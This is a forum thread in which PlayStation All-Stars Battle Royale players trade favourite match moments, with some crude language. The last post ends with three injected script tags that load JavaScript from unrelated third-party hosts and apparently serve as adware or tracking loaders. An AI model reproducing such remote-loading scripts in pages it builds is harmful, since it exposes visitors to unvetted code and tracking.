Uncharted Territory
1785 posts

Re: Favorite PSASBR Moment

Jan 11, 2013
Anytime I get to own someone with a big ego, like last night for example, i fought in a free for all stock match, this Raiden player with a mic kept talking like he's hot sh*t so this Evil Cole player later in the fight activated his level 2 and everyone but a Big Daddy player escaped it and at that point I got so sick of the Raiden player's ego so I just tossed him into Evil Cole's level 2on his has life, the Evil Cole player then sent me a friend request lol.
Message 21 of 26 (56 Views)
I Only Post Everything
1025 posts

Jan 11, 2013
Beating a 999 evil cole, and this guys e cole is just nasty, with Radec.

I just had another good one today. I'm playing as sweet tooth on sand over village and I got my level 2 and Im thinking danm I dont want this. So I tried to time it as best I could and they scattered. Well I turned it around and just let it drop to wear the bridge is right above the killer flounder. Well, this Ratchet player was under that bridge and the rocket took about 3 seconds to get there and he just didn't get off the windmill and when the rocket exploded it obliterated him. Oh yeah, he was about 60 point from his level 3. You know I did the ST derp dance after that too.
Message 22 of 26 (48 Views)
0 Likes
Uncharted Territory
1273 posts

Jan 11, 2013

Winning a match with my bro in 2v2 against players that keep using hit confirms to win(Sweet Tooth, E Coli)

"I'm watching you in the shadows........nah im right next to ya"
Message 23 of 26 (45 Views)
0 Likes
Lombax Warrior
151 posts

Jan 13, 2013
Hearing the Kratos player talking smack on my Princess before the match and then Owning Kratos, Raiden and Good Cole with FP, 8 Kills on them all and hearing the Kratos player complaint about me each time i killed them haha

Message 24 of 26 (33 Views)
0 Likes
First Son
7 posts

Jan 13, 2013

Oh, there were many funny moments xD   2vs2, against 2 Kratos-players...one managed to get lv 3..he killed my friend, then went after me, never hit. My friend laughed so hard, he almost fell off the bed xD

another day, 2vs2: I really beat the sh*t out of one guy. He screamed:" Dude help me! I get raped!!!"

At the last second: I (Raiden) tried to kill one guy(Drake), hit lv1: out of nowhere, the other 2 players tried to stop me, but they got hit and died. 

Message 25 of 26 (29 Views)
0 Likes
Gaming Beast
2167 posts

Jan 13, 2013
There are so many...

First off, it feels pretty nice to always get multiple game invites the moment I get online.

I also enjoy the multiple messages about my Big Daddy.

I REALLY enjoy being told that Big Daddy is OP (Happened today in a 2v2 match when I tech chased a whole bar from a Kratos player before his partner saved him. Not sure why he kept rolling through me and not away.).

I also enjoy days like today, where I win roughly 95% of all my matches.

Best feeling though is throwing Little Sister in the opposite direction of an opponent, who then thinks I whiffed, then turning around and Down throwing them into her. In a 2v2 match today we were in the last 5 seconds, both teams tied and I pulled that off. The guy was livid.

Oh, I also enjoyed a 2v2 match today where my partner and I (Good Cole and Big Daddy respectively) did so well that we made a Raiden/Kratos team ragequit in under a minute.

Finally, probably my favorite thing related to this game right now is leading my Pasta League group, and having managed to 4-0 SonicFox, something which will probably never happen again.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 26 of 26 (25 Views)
0 Likes